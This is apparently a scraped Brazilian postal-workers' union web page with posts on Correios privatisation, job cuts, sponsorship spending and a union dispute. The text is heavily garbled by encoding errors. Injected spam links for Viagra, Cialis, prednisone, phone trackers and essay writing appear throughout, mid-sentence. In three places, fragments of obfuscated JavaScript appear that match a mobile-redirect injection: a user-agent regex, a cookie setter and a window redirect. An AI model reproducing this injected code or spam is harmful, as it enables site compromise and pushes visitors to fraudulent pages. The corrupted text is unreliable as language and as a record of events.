Durante a entrevista, Alckmin falou sobre o enfrentamento às corporações tanto do funcionalismo público, quanto judiciário, empresarial e demais. Em relação às privatizações, afirmou que não irá privatizar o Banco do Brasil, e afirmou que temos um modelo muito concentrado, precisamos de mais bancos, desregulamentar, ter mais competição, a economia de mercado funciona com competição, outras formas de crédito, lei geral de garantia, cadastro positivo, cooperativas de crédito.

Já em relação à Caixa, disse que ainda vai ser estudado o que será feito e que ainda não há nada definido.

Segundo ele, a Petrobras não será privatizada, no entanto ele pretende quebrar o monopólio. Prospecção, pesquisa e produção de óleo devem ser da Petrobrás, ela é a líder mundial em águas profundas. Deverão ser privatizados a distribuição, transporte e quebrar o monopólio do refino. A indústria do petróleo e gás é essencial.

Já os Correios pode vir a ser privatizado. Temos 144, 145 empresas estatais, é claro que nós vamos privatizar, diz ele a exemplo do que foi feito em São Paulo e também a TV Brasil. Ele afirma que somente o Banco do Brasil não será privatizado. Na Petrobrás não será privatizada a prospecção, mas terá quebra do monopólio e as demais setores serão privatizados. 

Assista à entrevista completa:

 

 

 

 

 

 

 

O PL 6385/2016, de autoria do Deputado André Figueiredo (do PDT – CE), que na época era Ministro das Comunicações, dispõe sobre a prestação de serviços postais aos órgãos públicos federais da Administração Direta e Indireta, e dá outras providências, foi apresentado no dia 25/10/2016 e aprovado por unanimidade em sessão da Comissão de Ciência e tecnologia da Câmara dos Deputados nesta quarta-feira (06).

“Quando convertido em Lei, o PL 6385/2016 de minha autoria, que faz dos Correios o Operador logístico do Governo Federal, tem o potencial de triplicar as receitas anuais da empresa que é um patrimônio do povo brasileiro”, disse o deputado.

Este PL foi anexado ao PL 7638/2017 que dispõe sobre a prestação preferencial de serviços postais da Empresa Brasileira de Correios e Telégrafos pelos órgãos públicos federais da Administração Direta e Indireta nos termos do artigo 24, incisos, VIII da Lei 8.666/1993.

De acordo com Wilson Araújo, Diretor da FINDECT, Trata-se de uma vitória para a nação ao defender o Correios, e é motivo para nós trabalhadores e trabalhadoras dos Correios sermos gratos, por ainda haverem parlamentares dispostos a assim como nós, a lutarem em defesa da empresa”.

A FINDECT Continuará a somar forças para que este projeto se torne lei, beneficiando o Brasil inteiro através do Correios.

A Deputada Federal Jandira Feghali (PCdoB- RJ) fala em defesa dos Correios, uma das mais importantes estatais brasileiras, que vem sendo fortemente atacada, diminuída e fragilizada e do quanto isso pode ser triste. Dia após dia, sistematicamente se vê a empresa caindo no conceito da sociedade, sofrendo forte desestruturação por parte daqueles que pretendem torná-la enfraquecida, para com isso atingir seus próprios objetivos.

Os serviços prestados pelos Correios são muito importantes para o povo, dada por exemplo sua  estrutura, peculiaridade em chegar a lugares remotos por todo o país, de norte a sul, de leste a oeste. Onde outros não querem ir por não lucrarem com isso, os Correios vão.

A sociedade tem muito a perder coma precarização de serviços tão importantes, que é a tendência com o fechamento de mais de 500 agências que representa cerca de 5 mil demissões, juntando-se isso ao PDV (Programa de demissão voluntária), chega a 15 mil postos de trabalho fechados.

Percebe-se que não se fala em contratação de mão de obra desde 2011,  quando aconteceu  último concurso público na empresa. A tendência é deixar o quadro de trabalhadores insuficientes para a quantidade de trabalho, sucatear os serviços e assim preparar a empresa para o processo de privatização, a exemplo de outras estatais que vivenciaram o mesmo processo. 

A Deputada fala ainda que o país tem sofrido a perda de todos os seus instrumentos de  políticas estratégicas, como os Correios, que consegue integrar os quatro cantos do país através  das cartas, encomendas e outros serviços que oferece. “O povo brasileiro precisa dessa empresa, precisa dos seus trabalhadores”, disse.

A deputada chama de cruel com o Brasil e com os trabalhadores  a tentativa de privatizar,  exterminar e  jogar no campo do mercado e do lucro uma empresa tão importante e estratégica como os Correios. 

É necessários que mais parlamentares apoiem essa causa na luta em defesa dos Correios 100% público e de qualidade  para servir à população.

Assista ao vídeo na íntegra

 

 

A FINDECT tomou conhecimento sobre o anúncio do Ministro das Comunicações, Gilberto Kassab, dos resultados positivos nas finanças da ECT. Segundo Kassab, a Empresa apresentou lucro de R$667 milhões. Essa informação surge em meio ao vazamento seletivo de informações, onde foi exposta a intenção da atual administração dos Correios em fechar unidades em todo o país. Além do fechamento de agências, e Centros de Distribuição (CDD’s), a Empresa promete demitir mais de 5000 Trabalhadores.

Essa notícia, publicada pela agência Reuters, demonstra que a atual administração não está jogando limpo, nem com a categoria, nem com a população, ou com os próprios ministro no TST. No início desse ano, a Empresa conseguiu alterar a cláusula 28 Assistência Médica, do Acordo Coletivo de Trabalho, com a justificativa de que o plano de saúde dos Trabalhadores estava gerando grandes prejuízos.

Por isso, a FINDECT denunciou aos orgãos fiscalizadores, aos Deputados e Senadores, representantes do povo, e também à população, as intenções de desmonte e privatização dessa Empresa que tem mais de 350 anos, e é parte da história do Brasil. A Federação também irá solicitar, através de ofício, a apresentação do balanço financeiro oficial.

É importante, neste momento, manter a mobilização nacional, diante do terrorismo e da prática de assédio – já denunciados pela FINDECT – para que nenhum Trabalhador, ou Trabalhadora, seja prejudicado. A Federação conclama aos Sindicatos filiados, e aos Companheiros Ecetistas de todo o país, a acompanharem atentos às notícias e ações que envolvem a maior Empresa Pública do Brasil – Os Correios!

Fonte: FINDECT

Diante de um artigo publicado no Jornal A Gazeta no A?ltimo dia 10 deste mA?s,Ai??de autoria doAi??Presidente da FecomAi??rcio-ES, JosAi?? Lino Sepulcri, dA? a entender que os Correios detA?m o monopA?lio na entrega de encomendas, da mesma forma que detA?m o monopA?lio postal, mas isso trata-se de um equAi??voco sem precedentes por parte dele ao afirmar e por parte de todos aqueles que pensam da mesma maneira.

Artigo

Resposta do Presidente dos Correios, Carlos Fortner Viagra Sublingual buy

Cialis Soft order ENTENDENDO A DIFERENAi??A:

MonopA?lio entrega de encomendas- Se isso fosse verdade, significaria dizer que os Correios seria a AsNICA empresa em territA?rio nacional que poderia realizar a entrega de encomendas, o que nA?o acontece. AAi??legislaAi??A?o brasileira permite inclusive que empresas faAi??am o transporte de suas prA?prias encomendas e estabelece que nA?o hA? infraAi??A?o na realizaAi??A?o de entregas eventuais e sem fins lucrativos.Ai??

doxycycline without prescription

MonopA?lio Postal- Ai?? o que os Correios detA?m no Brasil. Os Correios sA?o a AsNICA empresa em territA?rio nacional autorizada a realizar a entrega de CORRESPONDASNCIAS.Ai??A ECT Ai?? detentora do monopA?lio de cartas no Brasil desde 1978.

Atualmente, os Correios disputa o mercado de entrega deAi??ENCOMENDAS com cerca de mais de 200 empresas, devido Ai??Ai??grande concorrA?ncia do mercado e tambAi??m disputa diariamente os clientes com estas empresas.Ai??Ai??Vale lembrar que, no Brasil, o monopA?lio postal se limitaAi??apenasAi??Ai??s correspondA?ncias, malotes e telegramas.

A chamada Lei Postal prevA? que, no territA?rio nacional, a UniA?o Ai?? responsA?vel pelo recebimento, transporte, entrega e expediAi??A?o de cartas, ao mesmo tempo em que Ai?? OBRIGADA a estar presente, atravAi??s dos Correios em todos os 5.570 municAi??pios do paAi??s.

Vale lembrar que ele nA?o pode escolher o mercado onde essa operaAi??A?o Ai?? mais conveniente nem mais lucrativa, jA? que Ai?? a prestaAi??A?o de serviAi??o postal lhe Ai?? exclusiva e em nome do Estado,Ai?? devendo ser realizada em todas as localidades, inclusive naquelas onde nenhum outro operador chega ou mesmo tenha interesse em chegar.Ai??

Existem sim, empresas concorrentes no segmento de entrega de mercadorias, mas os Correios ocupam posiAi??A?o de destaque nesse setor principalmente devido Ai??s parcerias com as lojas virtuais brasileiras. Este ano, por exemplo chegou a concorrer e foi um dos vencedores na categoriaAi??melhor empresa de LogAi??stica no E-commerce no PrA?mio ABComm de InovaAi??A?o Digital 2018, um dos maisAi??importantes e aguardados eventos do e-commerce nacional.

Por outro lado, as empresas da iniciativa privada, que nA?o possuem essa responsabilidade prevista em lei e visam A?nica e exclusivamente ao lucro, essas sim podem escolher onde entregar as mercadorias, de acordo com o seu interesse e o lucro que a operaAi??A?o trarA?.

A exemplo do monopA?lio postal dos Correios, assim como outras empresas pA?blicas pelo mundo tA?m o dever de resguardar o sigilo das informaAi??Ai??es e mensagens pessoais e comerciais, criando assim condiAi??Ai??esAi??necessA?rias Ai?? prestaAi??A?o de serviAi??os postais bA?sicos a toda a populaAi??A?o, independentemente da distA?ncia e dos custos da operaAi??A?o, garantindo assim, a igualdade e o direito deAi??todos Ai?? comunicaAi??A?o.

SINTECT-MA com informaAi??Ai??es do blog Correios do Brasil

 

Nos A?ltimos anos, cada vez menos investimentos tA?m sido feitos pela empresa tanto na categoria ou mesmo na prA?pria empresa, numa clara tentativa de sucateamento e atAi?? mesmo de perda de credibilidade perante a sociedade. O descaso Ai?? demonstrado na falta de contrataAi??A?o de mA?o de obra para a demanda de trabalho nas unidades por todo o paAi??s, na nA?o aquisiAi??A?o e falta de manutenAi??A?o adequada dos veAi??culos (carros e motos), na falta de seguranAi??a nas agA?ncias, na precariedade de infra estrutura de boa parte das unidades pelo paAi??s, na falta de EPIs e fardamento, entre outros tantos problemas que assolam o trabalhador no seu dia a dia, que dificultam e Ai??s vezes atAi?? impossibilitam o seu trabalho.

Sempre que Ai?? falado em ai???criseai??? nos Correios, fala-se tambAi??m em corte de despesas e o lugar preferido para os cortes tA?m sido frequentemente do lado do trabalhador. DemissAi??es, PDIai??i??s,Ai?? reduAi??A?o do nA?mero de agA?ncias, imposiAi??A?o de mensalidade no plano de saA?de e nA?o para por aAi??.

Por outro lado, a ai???criseai??? nunca foi motivo para cessarem os patrocAi??nios aos mais variados tipos de esportes e eventos ao longo dos anos.

InvestigaAi??Ai??es apontam que em 11 anos, sA? para a CBDAAi?? (ConfederaAi??A?o Brasileira de Desportos AquA?ticos)Ai?? que inclusive chegou aAi?? ser investigada em abril do ano passado, os Correios repassou mais de 62 milhAi??es em patrocAi??nios. Vale lembrar que o atual contrato de patrocAi??nio entre as partes estA? em vigor atAi?? o final de 2018 e gira em torno de R$ 5,7 milhAi??es.

Entre 2016 eAi??2018,Ai??os CorreiosAi??bancou diversos patrocAi??nios, em valores que se investidos na prA?pria empresa, melhorariam bastante as condiAi??Ai??es deAi??vida e de trabalho dos ecetistas, o que refletiria diretamente na qualidade dos serviAi??os Ai?? sociedade.

Female Cialis without prescription

Vale ressaltar que, enquanto trabalhadores, nA?o somos contra os patrocAi??nios sejam eles esportivos, culturais ou mesmo a eventos. O que nA?s queremos Ai?? que a empresa tambAi??m tenha compromisso conosco. A empresa deve sim cumprir tambAi??m seu papel social, mas uma coisa nA?o justifica nA?o fazer a outra, valorizando o trabalhador e a prA?pria empresa, com os investimentos necessA?rios. Sem falar que se trata de uma completa inversA?o de prioridades.

Somos contra o descaso da empresa conosco enquanto trabalhadores, a falta de compromisso e investimento nela mesma, sendo estes, dois dos principais fatores que representam a qualidade e excelA?ncia em seus serviAi??os Ai?? populaAi??A?o.

RELEMBRE ALGUNS DESSES PATROCA?NIOS ENTRE 2016 E 2018:

OlimpAi??adas ai??i?? 2016 ai??i??Ai?? http://fajar-anugrah.mhs.narotama.ac.id/2018/02/13/buy-cannabis-seeds-toronto/ R$ 465 mil

Projeto de Filatelia ai??i?? Junho 2016 ai??i??Ai??R$ 3 milhAi??es

ConfederaAi??A?o Brasileira de Desportos AquA?ticos ai??i?? Fevereiro 2017 ai??i??Ai??R$ 11,4 milhAi??es

Viagra Soft buy

ConfederaAi??A?o Brasileira de Handebol ai??i?? Fevereiro 2017Ai?? ai??i??Ai??R$ 3,2 milhAi??es

ConfederaAi??A?o Brasileira de Rugby ai??i?? Fevereiro 2017Ai?? Ai??ai??i??Ai??R$ 1,96 milhAi??es

Boi de Piratinins ai??i?? Junho 2017 ai??i??Ai??R$ 600 milAi??(o valor em 2016 era de R$ 321mil e dobrou)

CapixabA?o ai??i?? Janeiro 2018-Ai??Ai??R$500 mil

ConfederaAi??A?o Brasileira do desporto UniversitA?rio ai??i?? Abril 2018 ai??i??Ai?? Write my paper R$ 900 mil buy prednisone online

ACOMPANHE O QUE DIZ A PA?GINA DE PATROCA?NIOS DA EMPRESA:

ai???Os Correios, comprometidos em prestar serviAi??os postais com qualidade e excelA?ncia aos brasileiros, tambAi??m estA?o presentes em aAi??Ai??es que tA?m o esporte como instrumento de inclusA?o social, por meio da concessA?o de patrocAi??nios. Leia mais emAi??https://www.correios.com.br/sobre-os-correios/patrocinio

A LUTA Ai?? DIA?RIA:

A FINDECT, juntamente com os Sindicatos filiados, tA?m sido incansA?vel na luta pela manutenAi??A?o dos direitos da categoria Ecetista em todo o paAi??s, cobrando da empresa constantemente melhorias e investimentos que proporcionem aos trabalhadores e trabalhadoras ecetistas desempenharem suas atividades em seus locais de trabalho com seguranAi??a e qualidade, tenham seus direitos respeitados e mantidos. http://blog.xn--2-5wf2eljdmn4b6cn.com/?p=2409

Cada trabalhador que entende essa realidade precisa tambAi??m abraAi??ar essa causa, na luta diA?ria na rua, em casa, no local de trabalho, pelo respeito aos seus direitos tA?o duramente conquistados e nA?o permitir que a empresa continue dia apA?s dia a retirar direitos.

Fonte: FINDECT

A diretoria colegiada do SINTECT-MA, atravAi??s do ofAi??cio NA?035/2018 solicitou Ai?? empresa reuniAi??es setoriais nas unidades de trabalho, no perAi??odo de 02 a 06 de abril de 2018,Ai??tendo sido recusado o pedido.

Order micronase medication
Confira na Ai??ntegra o ofAi??cio e a resposta da empresa http://nail.uz/?p=147512

Em uma clara demonstraAi??A?o de que a empresa nA?o consegue manter uma A?nica linha de pensamento, ao mesmo tempo em que ela alega precisar diminuir a quantidade de carteiros entregando correspondA?ncias,Ai?? proAi??be o Sindicato mais uma vez de realizar reuniAi??es setoriais no perAi??odo por ele solicitado.

O Sindicato busca conversar com os trabalhadores nos CCDs para, com eles mais prA?ximos tratarmos de assuntos importantes como a falta de efetivo para entregar todas as correspondA?ncias, explicar sobre alteraAi??Ai??es no plano de saA?de, organizar os trabalhadores contra o DDA (DistribuiAi??A?o Domiciliar Alternada) e unir forAi??as para juntos esclarecermos para a sociedade, que a culpa da mA? qualidade na prestaAi??A?o dos serviAi??os nA?o Ai?? dos trabalhadores, mas da prA?pria empresa.

As barreiras colocadas pelos Correios nA?o irA?o impedir que o Sindicato realize o seu trabalho, pois este continuarA? dialogando com os trabalhadores utilizando todos os demais meios disponAi??veis.

Viagra Soft cheapest http://fajar-anugrah.mhs.narotama.ac.id/2018/02/15/buy-rogaine-foam/ order Deltasone Desde jA? manifestamos nosso repA?dio a essa atitude antissindical da empresa.Ai??

  |zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Ai?? do conhecimento dos trabalhadores que, foi feita uma licitaAi??A?o e existe um contrato para manutenAi??A?o das motos e carros na regional.

http://ovslink.com/sms-tracker-localizador-gps-movil/

Ocorre que a empresa que venceu a licitaAi??A?o, contratou oficinasAi?? em todo o estado paraAi??consertA?-las. Na prA?tica, as motos tA?m sido levadas a essas oficinas,Ai?? sA?o “consertadas” e voltam a apresentar os mesmos problemas de quando foram levadas para manutenAi??A?o ou mesmo problemas semelhantes.

Buy purim costumes AlAi??m disso, as oficinasAi??de uns meses pra cA?, tA?m retido as motos dos Correios,acusando a empresa que as contratou, de nA?o estar repassando a elas o dinheiro pelos serviAi??os prestados.

Cialis Black buy

Com isso, os carteiros nas unidades tA?m sido forAi??ados a revezarem no uso das motos para nA?o acumularem trabalho e tambAi??m para nA?o deixarem os clientes esperando mais que o tempo devido pela entrega de seus produtos e encomendas.

Devido a isso, o SINTECT-MA cobra dos Correios que essa situaAi??A?o seja vista e resolvida,a fim de que os trabalhadores voltem aAi?? realizar suas atividades sem transtornos e da forma que tem que ser, com entregas diA?rias.

Ai?? inadmissAi??vel que por ingerA?ncia da empresa responsA?vel, trabalhadores e clientes sejam mais uma vez prejudicados. Devem ser tomadas medidasAi??urgentes para que o serviAi??o seja prestado de forma correta e essas medidas sA?o de responsabilidade dos Correios cheap Deltasone .

)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Interessante como os Correios tA?m feito nos A?ltimos anos um discurso de “crise”Ai?? e ainda assim continua bancando patrocAi??nios esportivos. http://fajar-anugrah.mhs.narotama.ac.id/2018/02/15/how-much-lady-era/

A crise” Ai?? tamanha que nA?o se ouve falar em cortes em nenhum setor da empresa, inclusive em patrocAi??nios, jA? nA?o se pode dizer o mesmo em relaAi??A?o aos trabalhadores e trabalhadoras.Ai??

Deltasone without prescription Ou seja, do lado do trabalhadorAi?? tA?m sido feitos cortes, inclusive o golpe mais recente da empresa em IMPOR Cialis Black order http://nail.uz/?p=147536 uma mensalidade no plano de saA?de dos trabalhadores que mal conseguem administrar suas finanAi??as com o baixo salA?rio pago pela estatal e agora terA?o que arcar com mais essa despesa.

Dessa vez o patrocAi??nio, que estA? lA? noAi??DiA?rio Oficial da UniA?o doxycyclin buy Viber tracker, Mobile tracking. ,Ai??foi direcionado Ai?? ConfederaAi??A?o Brasileira de Desporto UniversitA?rio (CBDU) e o valor, na casa dos R$900.000,00 (Novecentos mil Reais).

 

  ek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Categoria denuncia desmonte com o objetivo de privatizar empresa centenA?ria

A Empresa Brasileira de Correios e TelAi??grafos ai??i?? ECT ai??i?? enfrenta hoje uma de suas piores crises. Com a administraAi??A?o nas mA?os de uma casta polAi??tica que investe no sucateamento, e que nA?o tem capacidade de responder aos ataques que setores da mAi??dia direcionam Ai?? Empresa, os Trabalhadores estA?o aflitos e preparados para enfrentar mais essa batalha.

Na gestA?o de Guilherme Campos, subordinada aos interesses de Kassab, Temer e seus comparsas, a precarizaAi??A?o dos serviAi??os traz grandes prejuAi??zos Ai?? empresa e aos seus Trabalhadores. Os cortes de direitos e benefAi??cios, e as demissAi??es recentes de mais de 20 mil trabalhadores, afetam diretamente a categoria, e a populaAi??A?o.

Hoje, com uma portaria publicada pelo MinistAi??rio das ComunicaAi??Ai??es, a entrega de cartas nA?o acontece mais diariamente. Chamado de DDA, ou DistribuiAi??A?o Domiciliar alternada, esse projeto nocivo leva Ai?? insatisfaAi??A?o, sobrecarga de trabalho, e a fortes ameaAi??as de privatizaAi??A?o.

Cleocin treatment for mrsa

As decisAi??es mal feitas pela atual gestA?o, e os erros das administraAi??Ai??es anteriores, colocam em risco a vida dos guerreiros Ecetistas, que estA?o diariamente, cara a cara, com a populaAi??A?o. A ordem Ai?? dar prioridade nas encomendas, deixando de lado as cartas simples e demais serviAi??os prestados pelos Correios.

http://tvcbh.com.br/?p=4663 Campos anunciou ao jornal valor econA?mico, nesta semana, que vai sair nos prA?ximos dias. Mas estA? deixando rastros de uma enorme destruiAi??A?o, como se fosse um furacA?o que destrA?i tudo por onde passa. Vai encerrar sua gestA?o na ECT para concorrer a uma vaga na CA?mara dos deputados. No entanto, antes disso, quer enterrar direitos e benefAi??cios histA?ricos dos trabalhadores, e manchar o nome dos Correios, precarizando a qualidade dos serviAi??os prestados Ai?? populaAi??A?o.

A FINDECT protocolarA?, nos prA?ximos dias, documento no MinistAi??rio das comunicaAi??Ai??es exigindo a reposiAi??A?o imediata das mais de 20 mil vagas em todo o paAi??s, e conscientizando os Trabalhadores, e a populaAi??A?o, sob a importA?ncia da manutenAi??A?o e fortalecimento dos Correios. Afinal, a ECT Ai?? um dos maiores patrimA?nios do povo Brasileiro, e deve ser administrada com responsabilidade e compromisso com seu desenvolvimento.

Fonte: FINDECT

http://nail.uz/?p=147562